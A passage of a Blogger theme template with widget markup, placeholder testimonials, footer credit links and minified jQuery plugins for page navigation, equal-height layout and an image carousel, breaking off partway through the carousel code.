src='https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgEnGLn1y_ydfNLPlq88boVobLEoCz4XKUZWiKMu2AQx0RQp_4NDEy-neRRelOljWsJrfxKXrG0tNe0-SKjA54F87t2e4TRVnwSLOxJkWUmjvieDpYCY_F2Qy4KjNQsxK_OCkxViBJ6t_o/w680/nth.png'/> </b:if> </a> <div class='post-info-wrap'><div class='post-info'> <b:if cond='data:post.labels'><span class='post-tag'><data:post.labels.first.name/></span></b:if> <h2 class='post-title'> <a expr:href='data:post.url'><data:post.title/></a> </h2> </div></div> </li> </b:if> </b:includable> <b:includable id='snippetedPostByline'> <b:with value='(data:widgets first (w => w.type == "Blog")).allBylineItems' var='blogBylines'> <div class='item-byline'> <b:with value='data:blogBylines first (i => i.name == "author")' var='byline'> <b:include cond='data:byline and data:this.postDisplay.showAuthor' data='post' name='postAuthor'/> </b:with> <b:with value='data:blogBylines first (i => i.name == "timestamp")' var='byline'> <b:include cond='data:byline and data:this.postDisplay.showDate' data='post' name='postTimestamp'/> </b:with> </div> </b:with> </b:includable> <b:includable id='snippetedPostContent'> <div class='post-content'> <b:include cond='data:this.postDisplay.showTitle' name='snippetedPostTitle'/> <b:include cond='data:this.postDisplay.showDate or data:this.postDisplay.showAuthor' name='snippetedPostByline'/> <b:include cond='data:this.postDisplay.showSnippet' data='post' name='postSnippet'/> <b:include cond='data:this.postDisplay.showFeaturedImage and data:post.featuredImage' name='snippetedPostThumbnail'/> </div> </b:includable> <b:includable id='snippetedPostThumbnail'> <div class='item-thumbnail'> <a expr:href='data:post.url'> <b:include data='{ image: data:post.featuredImage, imageSizes: [72, 144], imageRatio: "1:1", sourceSizes: "72px" }' name='responsiveImage'/> </a> </div> </b:includable> <b:includable id='snippetedPostTitle'> <b:if cond='data:post.title != ""'> <h3 class='post-title'><a expr:href='data:post.url'><data:post.title/></a></h3> </b:if> </b:includable> <b:includable id='snippetedPosts'> <div role='feed'> <!-- Don't render the post that we're currently already looking at. --> <b:loop values='data:posts filter (p => p.id != data:view.postId)' var='post'> <article class='post' role='article'> <b:include name='snippetedPostContent'/> </article> </b:loop> </div> </b:includable> </b:widget> <b:widget id='HTML7' locked='false' title='Projects' type='HTML' visible='true'> <b:widget-settings> <b:widget-setting name='content'>3/News/post-list</b:widget-setting> </b:widget-settings> <b:includable id='main'> <b:include name='widget-title'/> <div class='widget-content'> <data:content/> </div> </b:includable> </b:widget> <b:widget id='HTML2' locked='false' title='Subscribe Us' type='HTML' visible='true'> <b:widget-settings> <b:widget-setting name='content'><div class="videoWrapper"> <!-- Copy & Pasted from YouTube --> <iframe width="560" height="349" src="https://www.youtube.com/embed/keqDKvHV8Pk" frameborder="0" allowfullscreen></iframe> </div> <style> .videoWrapper { position: relative; padding-bottom: 56.25%; /* 16:9 */ padding-top: 25px; height: 0; } .videoWrapper iframe { position: absolute; top: 0; left: 0; width: 100%; height: 100%; } </style></b:widget-setting> </b:widget-settings> <b:includable id='main'> <b:include name='widget-title'/> <div class='widget-content'> <data:content/> </div> </b:includable> </b:widget> <b:widget id='Label1' locked='false' title='Categories' type='Label' version='2' visible='true'> <b:widget-settings> <b:widget-setting name='sorting'>ALPHA</b:widget-setting> <b:widget-setting name='display'>LIST</b:widget-setting> <b:widget-setting name='selectedLabelsList'>Aadhar,CSS3 Tutorials,Graphic Works,HTML5 Design,Web Design</b:widget-setting> <b:widget-setting name='showType'>USER_SELECTED</b:widget-setting> <b:widget-setting name='showFreqNumbers'>true</b:widget-setting> </b:widget-settings> <b:includable id='main' var='this'> <b:include name='widget-title'/> <b:include name='content'/> </b:includable> <b:includable id='cloud'> <b:loop values='data:labels' var='label'> <span class='label-size'> <b:class expr:name='"label-size-" + data:label.cssSize'/> <a class='label-name' expr:href='data:label.url'> <data:label.name/> <b:if cond='data:this.showFreqNumbers'> <span class='label-count'><data:label.count/></span> </b:if> </a> </span> </b:loop> </b:includable> <b:includable id='content'> <div class='widget-content'> <b:class expr:name='data:this.display + "-label"'/> <b:include cond='data:this.display == "list"' name='list'/> <b:include cond='data:this.display == "cloud"' name='list'/> </div> </b:includable> <b:includable id='list'> <ul> <b:loop values='data:labels' var='label'> <li> <a class='label-name' expr:href='data:label.url'> <data:label.name/> <b:if cond='data:this.showFreqNumbers'> <span class='label-count'><data:label.count/></span> </b:if> </a> </li> </b:loop> </ul> </b:includable> </b:widget> <b:widget id='Label2' locked='false' title='Tags' type='Label' version='2' visible='true'> <b:widget-settings> <b:widget-setting name='sorting'>ALPHA</b:widget-setting> <b:widget-setting name='display'>CLOUD</b:widget-setting> <b:widget-setting name='selectedLabelsList'/> <b:widget-setting name='showType'>ALL</b:widget-setting> <b:widget-setting name='showFreqNumbers'>false</b:widget-setting> </b:widget-settings> <b:includable id='main' var='this'> <b:include name='widget-title'/> <b:include name='content'/> </b:includable> <b:includable id='cloud'> <b:loop values='data:labels' var='label'> <span class='label-size'> <b:class expr:name='"label-size-" + data:label.cssSize'/> <a class='label-name' expr:href='data:label.url'> <data:label.name/> <b:if cond='data:this.showFreqNumbers'> <span class='label-count'><data:label.count/></span> </b:if> </a> </span> </b:loop> </b:includable> <b:includable id='content'> <div class='widget-content'> <b:class expr:name='data:this.display + "-label"'/> <b:include cond='data:this.display == "list"' name='list'/> <b:include cond='data:this.display == "cloud"' name='list'/> </div> </b:includable> <b:includable id='list'> <ul> <b:loop values='data:labels' var='label'> <li> <a class='label-name' expr:href='data:label.url'> <data:label.name/> <b:if cond='data:this.showFreqNumbers'> <span class='label-count'><data:label.count/></span> </b:if> </a> </li> </b:loop> </ul> </b:includable> </b:widget> </b:section> </div> </div> </div> <div class='clearfix'/> <b:if cond='data:view.isHomepage'> <div id='testimonial-wrap'> <div class='container row'> <b:section class='wow fadeInDownBig head-text' id='head-text5' maxwidgets='1' name='Headline Text 05' showaddelement='no'> <b:widget id='Text5' locked='true' title='What our clients say' type='Text' version='2' visible='true'> <b:widget-settings> <b:widget-setting name='content'><![CDATA[Lorem Ipsum has been the industry's standard dummy text.]]></b:widget-setting> </b:widget-settings> <b:includable id='main'> <b:include name='widget-title'/> <p class='widget-content'><data:content/></p> </b:includable> </b:widget> </b:section> <b:section class='wow fadeInUpBig' id='testimonial' maxwidgets='6' name='Main Testimonials' showaddelement='no'> <b:widget id='Image15' locked='true' title='Richard Roe' type='Image' version='2' visible='true'> <b:widget-settings> <b:widget-setting name='displayUrl'>https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhJaoe7UCtujR_r_cSPAgJKqv2stgPRSo_PYTnAqDLK4DE_xHKKEdReOWJsv07MXIo2ODL1DVgG6Fc1jhgzRVVFAyeO0KtN-aHJ7s1Wul7z75LhbHC5t284yHSrWT_-3f0IwjpZgz3LSlE/s280/13.jpg</b:widget-setting> <b:widget-setting name='displayHeight'>186</b:widget-setting> <b:widget-setting name='sectionWidth'>150</b:widget-setting> <b:widget-setting name='shrinkToFit'>false</b:widget-setting> <b:widget-setting name='displayWidth'>280</b:widget-setting> <b:widget-setting name='link'>UX Designer</b:widget-setting> <b:widget-setting name='caption'><![CDATA[Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry's standard dummy text ever since, and more recently with desktop publishing software.]]></b:widget-setting> </b:widget-settings> <b:includable id='main'> <b:include name='content'/> </b:includable> <b:includable id='content'> <div class='widget-content'> <style type='text/css'> #testimonial-wrap{display:block} </style> <b:if cond='data:caption'> <div class='testi-info-quotes'> <p class='testi-snippet'><data:caption/></p> </div> </b:if> <div class='testi-bottom-info'> <div class='testi-avatar'><img expr:alt='data:title' expr:src='data:sourceUrl'/></div> <div class='testi-info'> <h3 class='testi-title'><data:title/></h3> <span class='testi-meta'><data:link/></span> </div> </div> </div> </b:includable> </b:widget> <b:widget id='Image16' locked='true' title='Janie Doe' type='Image' version='2' visible='true'> <b:widget-settings> <b:widget-setting name='displayUrl'>https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiqV7Zwvl9g9mHjnMaMiT6XKIJEvTCedYY9sOYIcglEmKIeW0TmNxO0lJ-Q6VoloM4Yx-EWjbeRDTqytKZZh2LI9Yb5gXJkxRW7M9eQoLfIzQXWYMWvj7M4pRdHYQGljXFG2qAhP-ps2-I/s280/11.jpg</b:widget-setting> <b:widget-setting name='displayHeight'>187</b:widget-setting> <b:widget-setting name='sectionWidth'>150</b:widget-setting> <b:widget-setting name='shrinkToFit'>false</b:widget-setting> <b:widget-setting name='displayWidth'>280</b:widget-setting> <b:widget-setting name='link'>UI Designer</b:widget-setting> <b:widget-setting name='caption'><![CDATA[Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry's standard dummy text ever since, and more recently with desktop publishing software.]]></b:widget-setting> </b:widget-settings> <b:includable id='main'> <b:include name='content'/> </b:includable> <b:includable id='content'> <div class='widget-content'> <style type='text/css'> #testimonial-wrap{display:block} </style> <b:if cond='data:caption'> <div class='testi-info-quotes'> <p class='testi-snippet'><data:caption/></p> </div> </b:if> <div class='testi-bottom-info'> <div class='testi-avatar'><img expr:alt='data:title' expr:src='data:sourceUrl'/></div> <div class='testi-info'> <h3 class='testi-title'><data:title/></h3> <span class='testi-meta'><data:link/></span> </div> </div> </div> </b:includable> </b:widget> <b:widget id='Image17' locked='true' title='Katie Fox' type='Image' version='2' visible='true'> <b:widget-settings> <b:widget-setting name='displayUrl'>https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8F2vxyy9BaJViYV1zhczQm7jFhHmXT57Hzmnf9qfurl8BoEN-xZC6h41AGmFiuT8Q_7hLbeyWC0tbkIXTX4aNRG5LELdVAMUHZ_gT1TzLtU1O6_LYaUG0bDV2YFSY8MnBqQ9NlWgRXpdq/s280/6.jpg</b:widget-setting> <b:widget-setting name='displayHeight'>190</b:widget-setting> <b:widget-setting name='sectionWidth'>150</b:widget-setting> <b:widget-setting name='shrinkToFit'>false</b:widget-setting> <b:widget-setting name='displayWidth'>280</b:widget-setting> <b:widget-setting name='link'>Fashion Blogger</b:widget-setting> <b:widget-setting name='caption'><![CDATA[Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry's standard dummy text ever since, and more recently with desktop publishing software.]]></b:widget-setting> </b:widget-settings> <b:includable id='main'> <b:include name='content'/> </b:includable> <b:includable id='content'> <div class='widget-content'> <style type='text/css'> #testimonial-wrap{display:block} </style> <b:if cond='data:caption'> <div class='testi-info-quotes'> <p class='testi-snippet'><data:caption/></p> </div> </b:if> <div class='testi-bottom-info'> <div class='testi-avatar'><img expr:alt='data:title' expr:src='data:sourceUrl'/></div> <div class='testi-info'> <h3 class='testi-title'><data:title/></h3> <span class='testi-meta'><data:link/></span> </div> </div> </div> </b:includable> </b:widget> <b:widget id='Image18' locked='true' title='Melisa Edwards' type='Image' version='2' visible='true'> <b:widget-settings> <b:widget-setting name='displayUrl'>https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEikr_-uY_fllbjVHcBxaJVAzNK75duVzSghKAYtiXZDird1Fo4VM0OlVjFeSKWqyisUXbQKmfTgamVXsub-QlS3ljrsCkkLeIHlkEnV1wRocUQv8ZVcDnUgUgORycxkE5wXeX3B5JmiSAw/w280/glo3.jpg</b:widget-setting> <b:widget-setting name='displayHeight'>186</b:widget-setting> <b:widget-setting name='sectionWidth'>150</b:widget-setting> <b:widget-setting name='shrinkToFit'>false</b:widget-setting> <b:widget-setting name='displayWidth'>280</b:widget-setting> <b:widget-setting name='link'>Food Critic</b:widget-setting> <b:widget-setting name='caption'><![CDATA[Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry's standard dummy text ever since, and more recently with desktop publishing software.]]></b:widget-setting> </b:widget-settings> <b:includable id='main'> <b:include name='content'/> </b:includable> <b:includable id='content'> <div class='widget-content'> <style type='text/css'> #testimonial-wrap{display:block} </style> <b:if cond='data:caption'> <div class='testi-info-quotes'> <p class='testi-snippet'><data:caption/></p> </div> </b:if> <div class='testi-bottom-info'> <div class='testi-avatar'><img expr:alt='data:title' expr:src='data:sourceUrl'/></div> <div class='testi-info'> <h3 class='testi-title'><data:title/></h3> <span class='testi-meta'><data:link/></span> </div> </div> </div> </b:includable> </b:widget> </b:section> </div> </div> <div class='clearfix'/> </b:if> <div id='footer-wrapper-bg'> <b:if cond='data:view.isHomepage'> <div class='wow tada' id='brand-services-wrap'> <div class='container row'> <b:section id='intro-brand' maxwidgets='5' name='Brand Logos' showaddelement='no'> <b:widget id='LinkList78' locked='true' title='Brand Logos' type='LinkList' version='2' visible='true'> <b:widget-settings> <b:widget-setting name='link-3'>#</b:widget-setting> <b:widget-setting name='sorting'>NONE</b:widget-setting> <b:widget-setting name='link-4'>#</b:widget-setting> <b:widget-setting name='text-1'>https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgBC2Zp5o6qtGdvGapQxpK2n6KuIrrH1OE1k_QcA-ikMtNt7Ae3jExwVfnS77jL2QBd2DpkHFmClo3q_WVFrL8y67VfDonN5WjQPBX_jjZvsWz9j4temz1IS-6ZhhWcfpvTu3FcKCGJnxnY2LVOkvfmTTyUwvwz_Xeah09zCPnKzY2RAQ1OVnQy86D1Zw/s185/Client-02.png</b:widget-setting> <b:widget-setting name='link-1'>#</b:widget-setting> <b:widget-setting name='text-0'>https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjN3XvOWKkcOA_TjJABA2EJY4cqNgL5HEr9Fg6gruohYrSEUUnjlLsfTKiddw1z3GwfK5rDojwdkCW64laNzLaTgtXCESP9f1eKjBHT581hf8rP9gBpBkntjnk8uCSTuadYWI91HM1BXuG4t7iUBoQgY5p4McI92aTx7Ws8xpERXTAvYy8_TJ-02GvH8w/s185/Client-01.png</b:widget-setting> <b:widget-setting name='link-2'>#</b:widget-setting> <b:widget-setting name='text-3'>https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiXpN76q2FkcVTcADnMCuu-iA0-daMlVuJ0h_lWBKM6pBA1jsAadhVvDAfeEn1DH65zIDULqsPONZqgo1Yod9azwQk1VEaNbTG99Pn6TVxywW8pOJ0zE6I_soUpH8hz8iZv37fi70ZZEqoaDmlb5Bca6-THt8t8Cb0XgBciREhx5CyA91XKSo02E2aw4g/s185/Client-04.png</b:widget-setting> <b:widget-setting name='link-0'>#</b:widget-setting> <b:widget-setting name='text-2'>https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEguok9pjIKCSQST9jPPWrUcwqdYRP5hNhSi7X113GQprbgpI_rlV2WwJwoq-1VypT9ZMXiZG7Fscsx8MHXrai7sdfEAE-iIrGO872DrIHRxeykGm4Ai4EaXzn7ZIVmHKQmdMSFG0u2zE9osq7-WAq58ZZdfLSIlT6olKeKVQ4kVbX5jUNSuvvcZb2hlfA/s185/Client-03.png</b:widget-setting> <b:widget-setting name='text-4'>https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiGTxN-OGLH_YnY--dqcSZYp4WF_s0PUs9HKmlvdSSHHpCU50UiDx7txVnXiIMG7dbPJDEO6p50o8jcmRRq2KRdS-QEM0OOjFIN3ZAmlyXJTUGVgUjQA2POlXh67P1Y3wHvPFqW9oXkp6f29hceVqHYa2hsLVP5PR0wgtLOtMfwuYI98l4HEiArTmSakg/s185/Client-05.png</b:widget-setting> </b:widget-settings> <b:includable id='main'> <b:include name='widget-title'/> <b:include name='content'/> </b:includable> <b:includable id='content'> <div class='widget-content'> <style type='text/css'> #brand-services-wrap{display:block} </style> <ul> <b:loop values='data:links' var='link'> <li expr:class='data:link.target'><img expr:src='data:link.name' target='_blank'/></li> </b:loop> </ul> </div> </b:includable> </b:widget> </b:section> </div> </div> <div class='clearfix'/> </b:if> <!-- Footer Wrapper --> <div id='footer-wrapper'> <div class='wow bounceInUp' id='footer-copyright'> <div class='container row'> <div class='copyright-area'>Created By <a href='http://soratemplates.com/' id='mycontent' rel='dofollow' title='SoraTemplates'>Themes</a> | Distributed By <a href='https://gooyaabitemplates.com/' rel='dofollow' style='color:#ff00ba;' target='_blank' title='Blogger'>Blogger</a></div> <b:section class='top-bar-nav' id='top-bar-nav' maxwidgets='1' name='Footer Navigation' showaddelement='yes'> <b:widget id='LinkList72' locked='true' title='Link List' type='LinkList' version='2' visible='true'> <b:widget-settings> <b:widget-setting name='sorting'>NONE</b:widget-setting> <b:widget-setting name='text-1'>About</b:widget-setting> <b:widget-setting name='link-1'>https://solio-soratemplates.blogspot.com/p/about_29.html</b:widget-setting> <b:widget-setting name='text-0'>Home</b:widget-setting> <b:widget-setting name='link-2'>https://solio-soratemplates.blogspot.com/p/contact-us_29.html</b:widget-setting> <b:widget-setting name='link-0'>/</b:widget-setting> <b:widget-setting name='text-2'>Contact Us</b:widget-setting> </b:widget-settings> <b:includable id='main'> <b:include name='content'/> </b:includable> <b:includable id='content'> <div class='widget-content'> <ul> <b:loop values='data:links' var='link'> <li><a expr:href='data:link.target'><data:link.name/></a></li> </b:loop> </ul> </div> </b:includable> </b:widget> </b:section> <div class='clearfix'/> </div> </div> </div> </div> </div> <b:if cond='data:view.isSingleItem'> <!-- Hidden Widgets --> <div id='hidden-widgets-wrap' style='display:none'> <b:section class='hidden-widgets' deleted='true' id='hidden-widgets' maxwidgets='1' showaddelement='no'> <b:widget id='ContactForm1' locked='false' title='Contact form' type='ContactForm' version='2' visible='true'> <b:includable id='main' var='this'> <b:include name='widget-title'/> <b:include name='content'/> </b:includable> <b:includable id='content'> <b:include name='contact-form-content'/> </b:includable> </b:widget> </b:section> </div> </b:if> <!-- Main Scripts --> <script src='https://ajax.googleapis.com/ajax/libs/jquery/1.12.4/jquery.min.js' type='text/javascript'/> <!-- Theme Functions JS --> <script type='text/javascript'> //<![CDATA[ /* * jQuery One Page Nav Plugin * http://github.com/davist11/jQuery-One-Page-Nav * Copyright (c) 2010 Trevor Davis (http://trevordavis.net) * Dual licensed under the MIT and GPL licenses. * Uses the same license as jQuery, see: * http://jquery.org/license * @version 3.0.0 */ ;(function($,window,document,undefined){var OnePageNav=function(elem,options){this.elem=elem;this.$elem=$(elem);this.options=options;this.metadata=this.$elem.data('plugin-options');this.$win=$(window);this.sections={};this.didScroll=false;this.$doc=$(document);this.docHeight=this.$doc.height();};OnePageNav.prototype={defaults:{navItems:'a',currentClass:'current',changeHash:false,easing:'swing',filter:'',scrollSpeed:750,scrollThreshold:0.5,begin:false,end:false,scrollChange:false},init:function(){this.config=$.extend({},this.defaults,this.options,this.metadata);this.$nav=this.$elem.find(this.config.navItems);if(this.config.filter!==''){this.$nav=this.$nav.filter(this.config.filter);} this.$nav.on('click.onePageNav',$.proxy(this.handleClick,this));this.getPositions();this.bindInterval();this.$win.on('resize.onePageNav',$.proxy(this.getPositions,this));return this;},adjustNav:function(self,$parent){self.$elem.find('.'+self.config.currentClass).removeClass(self.config.currentClass);$parent.addClass(self.config.currentClass);},bindInterval:function(){var self=this;var docHeight;self.$win.on('scroll.onePageNav',function(){self.didScroll=true;});self.t=setInterval(function(){docHeight=self.$doc.height();if(self.didScroll){self.didScroll=false;self.scrollChange();} if(docHeight!==self.docHeight){self.docHeight=docHeight;self.getPositions();}},250);},getHash:function($link){return $link.attr('href').split('#')[1];},getPositions:function(){var self=this;var linkHref;var topPos;var $target;self.$nav.each(function(){linkHref=self.getHash($(this));$target=$('#'+linkHref);if($target.length){topPos=$target.offset().top;self.sections[linkHref]=Math.round(topPos);}});},getSection:function(windowPos){var returnValue=null;var windowHeight=Math.round(this.$win.height()*this.config.scrollThreshold);for(var section in this.sections){if((this.sections[section]-windowHeight)<windowPos){returnValue=section;}} return returnValue;},handleClick:function(e){var self=this;var $link=$(e.currentTarget);var $parent=$link.parent();var newLoc='#'+self.getHash($link);if(!$parent.hasClass(self.config.currentClass)){if(self.config.begin){self.config.begin();} self.adjustNav(self,$parent);self.unbindInterval();self.scrollTo(newLoc,function(){if(self.config.changeHash){window.location.hash=newLoc;} self.bindInterval();if(self.config.end){self.config.end();}});} e.preventDefault();},scrollChange:function(){var windowTop=this.$win.scrollTop();var position=this.getSection(windowTop);var $parent;if(position!==null){$parent=this.$elem.find('a[href$="#'+position+'"]').parent();if(!$parent.hasClass(this.config.currentClass)){this.adjustNav(this,$parent);if(this.config.scrollChange){this.config.scrollChange($parent);}}}},scrollTo:function(target,callback){var offset=$(target).offset().top;$('html, body').animate({scrollTop:offset},this.config.scrollSpeed,this.config.easing,callback);},unbindInterval:function(){clearInterval(this.t);this.$win.unbind('scroll.onePageNav');}};OnePageNav.defaults=OnePageNav.prototype.defaults;$.fn.onePageNav=function(options){return this.each(function(){new OnePageNav(this,options).init();});};})(jQuery,window,document); /* * jquery-match-height 0.7.0 by @liabru * http://brm.io/jquery-match-height/ * License MIT */ !function(t){"use strict";"function"==typeof define&&define.amd?define(["jquery"],t):"undefined"!=typeof module&&module.exports?module.exports=t(require("jquery")):t(jQuery)}(function(t){var e=-1,o=-1,i=function(t){return parseFloat(t)||0},a=function(e){var o=1,a=t(e),n=null,r=[];return a.each(function(){var e=t(this),a=e.offset().top-i(e.css("margin-top")),s=r.length>0?r[r.length-1]:null;null===s?r.push(e):Math.floor(Math.abs(n-a))<=o?r[r.length-1]=s.add(e):r.push(e),n=a}),r},n=function(e){var o={ byRow:!0,property:"height",target:null,remove:!1};return"object"==typeof e?t.extend(o,e):("boolean"==typeof e?o.byRow=e:"remove"===e&&(o.remove=!0),o)},r=t.fn.matchHeight=function(e){var o=n(e);if(o.remove){var i=this;return this.css(o.property,""),t.each(r._groups,function(t,e){e.elements=e.elements.not(i)}),this}return this.length<=1&&!o.target?this:(r._groups.push({elements:this,options:o}),r._apply(this,o),this)};r.version="0.7.0",r._groups=[],r._throttle=80,r._maintainScroll=!1,r._beforeUpdate=null, r._afterUpdate=null,r._rows=a,r._parse=i,r._parseOptions=n,r._apply=function(e,o){var s=n(o),h=t(e),l=[h],c=t(window).scrollTop(),p=t("html").outerHeight(!0),d=h.parents().filter(":hidden");return d.each(function(){var e=t(this);e.data("style-cache",e.attr("style"))}),d.css("display","block"),s.byRow&&!s.target&&(h.each(function(){var e=t(this),o=e.css("display");"inline-block"!==o&&"flex"!==o&&"inline-flex"!==o&&(o="block"),e.data("style-cache",e.attr("style")),e.css({display:o,"padding-top":"0", "padding-bottom":"0","margin-top":"0","margin-bottom":"0","border-top-width":"0","border-bottom-width":"0",height:"100px",overflow:"hidden"})}),l=a(h),h.each(function(){var e=t(this);e.attr("style",e.data("style-cache")||"")})),t.each(l,function(e,o){var a=t(o),n=0;if(s.target)n=s.target.outerHeight(!1);else{if(s.byRow&&a.length<=1)return void a.css(s.property,"");a.each(function(){var e=t(this),o=e.attr("style"),i=e.css("display");"inline-block"!==i&&"flex"!==i&&"inline-flex"!==i&&(i="block");var a={ display:i};a[s.property]="",e.css(a),e.outerHeight(!1)>n&&(n=e.outerHeight(!1)),o?e.attr("style",o):e.css("display","")})}a.each(function(){var e=t(this),o=0;s.target&&e.is(s.target)||("border-box"!==e.css("box-sizing")&&(o+=i(e.css("border-top-width"))+i(e.css("border-bottom-width")),o+=i(e.css("padding-top"))+i(e.css("padding-bottom"))),e.css(s.property,n-o+"px"))})}),d.each(function(){var e=t(this);e.attr("style",e.data("style-cache")||null)}),r._maintainScroll&&t(window).scrollTop(c/p*t("html").outerHeight(!0)), this},r._applyDataApi=function(){var e={};t("[data-match-height], [data-mh]").each(function(){var o=t(this),i=o.attr("data-mh")||o.attr("data-match-height");i in e?e[i]=e[i].add(o):e[i]=o}),t.each(e,function(){this.matchHeight(!0)})};var s=function(e){r._beforeUpdate&&r._beforeUpdate(e,r._groups),t.each(r._groups,function(){r._apply(this.elements,this.options)}),r._afterUpdate&&r._afterUpdate(e,r._groups)};r._update=function(i,a){if(a&&"resize"===a.type){var n=t(window).width();if(n===e)return;e=n; }i?-1===o&&(o=setTimeout(function(){s(a),o=-1},r._throttle)):s(a)},t(r._applyDataApi),t(window).bind("load",function(t){r._update(!1,t)}),t(window).bind("resize orientationchange",function(t){r._update(!0,t)})}); /*! Owl carousel by Bartosz Wojciechowski/David Deutsch | v2.0.0 - http://owlcarousel2.github.io/OwlCarousel2 */ !function(a,b,c,d){function e(b,c){this.settings=null,this.options=a.extend({},e.Defaults,c),this.$element=a(b),this.drag=a.extend({},m),this.state=a.extend({},n),this.e=a.extend({},o),this._plugins={},this._supress={},this._current=null,this._speed=null,this._coordinates=[],this._breakpoint=null,this._width=null,this._items=[],this._clones=[],this._mergers=[],this._invalidated={},this._pipe=[],a.each(e.Plugins,a.proxy(function(a,b){this._plugins[a[0].toLowerCase()+a.slice(1)]=new b(this)},this)),a.each(e.Pipe,a.proxy(function(b,c){this._pipe.push({filter:c.filter,run:a.proxy(c.run,this)})},this)),this.setup(),this.initialize()}function f(a){if(a.touches!==d)return{x:a.touches[0].pageX,y:a.touches[0].pageY};if(a.touches===d){if(a.pageX!==d)return{x:a.pageX,y:a.pageY};if(a.pageX===d)return{x:a.clientX,y:a.clientY}}}function g(a){var b,d,e=c.createElement("div"),f=a;for(b in f)if(d=f[b],"undefined"!=typeof e.style[d])return e=null,[d,b];return[!1]}function h(){return g(["transition","WebkitTransition","MozTransition","OTransition"])[1]}function i(){return g(["transform","WebkitTransform","MozTransform","OTransform","msTransform"])[0]}function j(){return g(["perspective","webkitPerspective","MozPerspective","OPerspective","MsPerspective"])[0]}function k(){return"ontouchstart"in b||!!navigator.msMaxTouchPoints}function l(){return b.navigator.msPointerEnabled}var m,n,o;m={start:0,startX:0,startY:0,current:0,currentX:0,currentY:0,offsetX:0,offsetY:0,distance:null,startTime:0,endTime:0,updatedX:0,targetEl:null},n={isTouch:!1,isScrolling:!1,isSwiping:!1,direction:!1,inMotion:!1},o={_onDragStart:null,_onDragMove:null,_onDragEnd:null,_transitionEnd:null,_resizer:null,_responsiveCall:null,_goToLoop:null,_checkVisibile:null},e.Defaults={items:3,loop:!1,center:!1,mouseDrag:!0,touchDrag:!0,pullDrag:!0,freeDrag:!1,margin:0,stagePadding:0,merge:!1,mergeFit:!0,autoWidth:!1,startPosition:0,rtl:!1,smartSpeed:250,fluidSpeed:!1,dragEndSpeed:!1,responsive:{},responsiveRefreshRate:200,responsiveBaseElement:b,responsiveClass:!1,fallbackEasing:"swing",info:!1,nestedItemSelector:!1,itemElement:"div",stageElement:"div",themeClass:"owl-theme",baseClass:"owl-carousel",itemClass:"owl-item",centerClass:"center",activeClass:"active"},e.Width={Default:"default",Inner:"inner",Outer:"outer"},e.Plugins={},e.Pipe=[{filter:["width","items","settings"],run:function(a){a.current=this._items&&this._items[this.relative(this._current)]}},{filter:["items","settings"],run:function(){var a=this._clones,b=this.$stage.children(".cloned");(b.length!==a.length||!this.settings.loop&&a.length>0)&&(this.$stage.children(".cloned").remove(),this._clones=[])}},{filter:["items","settings"],run:function(){var a,b,c=this._clones,d=this._items,e=this.settings.loop?c.length-Math.max(2*this.settings.items,4):0;for(a=0,b=Math.abs(e/2);b>a;a++)e>0?(this.$stage.children().eq(d.length+c.length-1).remove(),c.pop(),this.$stage.children().eq(0).remove(),c.pop()):(c.push(c.length/2),this.$stage.append(d[c[c.length-1]].clone().addClass("cloned")),c.push(d.length-1-(c.length-1)/2),this.$stage.prepend(d[c[c.length-1]].clone().addClass("cloned")))}},{filter:["width","items","settings"],run:function(){var a,b,c,d=this.settings.rtl?1:-1,e=(this.width()/this.settings.items).toFixed(3),f=0;for(this._coordinates=[],b=0,c=this._clones.length+this._items.length;c>b;b++)a=this._mergers[this.relative(b)],a=this.settings.mergeFit&&Math.min(a,this.settings.items)||a,f+=(this.settings.autoWidth?this._items[this.relative(b)].width()+this.settings.margin:e*a)*d,this._coordinates.push(f)}},{filter:["width","items","settings"],run:function(){var b,c,d=(this.width()/this.settings.items).toFixed(3),e={width:Math.abs(this._coordinates[this._coordinates.length-1])+2*this.settings.stagePadding,"padding-left":this.settings.stagePadding||"","padding-right":this.settings.stagePadding||""};if(this.$stage.css(e),e={width:this.settings.autoWidth?"auto":d-this.settings.margin},e[this.settings.rtl?"margin-left":"margin-right"]=this.settings.margin,!this.settings.autoWidth&&a.grep(this._mergers,function(a){return a>1}).length>0)for(b=0,c=this._coordinates.length;c>b;b++)e.width=Math.abs(this._coordinates[b])-Math.abs(this._coordinates[b-1]||0)-this.settings.margin,this.$stage.children().eq(b).css(e);else this.$stage.children().css(e)}},{filter:["width","items","settings"],run:function(a){a.current&&this.reset(this.$stage.children().index(a.current))}},{filter:["position"],run:function(){this.animate(this.coordinates(this._current))}},{filter:["width","position","items","settings"],run:function(){var a,b,c,d,e=this.settings.rtl?1:-1,f=2*this.settings.stagePadding,g=this.coordinates(this.current())+f,h=g+this.width()*e,i=[];for(c=0,d=this._coordinates.length;d>c;c++)a=this._coordinates[c-1]||0,b=Math.abs(this._coordinates[c])+f*e,(this.op(a,"<=",g)&&this.op(a,">",h)||this.op(b,"<",g)&&this.op(b,">",h))&&i.push(c);this.$stage.children("."+this.settings.activeClass).removeClass(this.settings.activeClass),this.$stage.children(":eq("+i.join("), :eq(")+")").addClass(this.settings.activeClass),this.settings.center&&(this.$stage.children("."+this.settings.centerClass).removeClass(this.settings.centerClass),this.$stage.children().eq(this.current()).addClass(this.settings.centerClass))}}],e.prototype.initialize=function(){if(this.trigger("initialize"),this.$element.addClass(this.settings.baseClass).addClass(this.settings.themeClass).toggleClass("owl-rtl",this.settings.rtl),this.browserSupport(),this.settings.autoWidth&&this.state.imagesLoaded!==!0){var b,c,e;if(b=this.$element.find("img"),c=this.settings.nestedItemSelector?"."+this.settings.nestedItemSelector:d,e=this.$element.children(c).width(),b.length&&0>=e)return 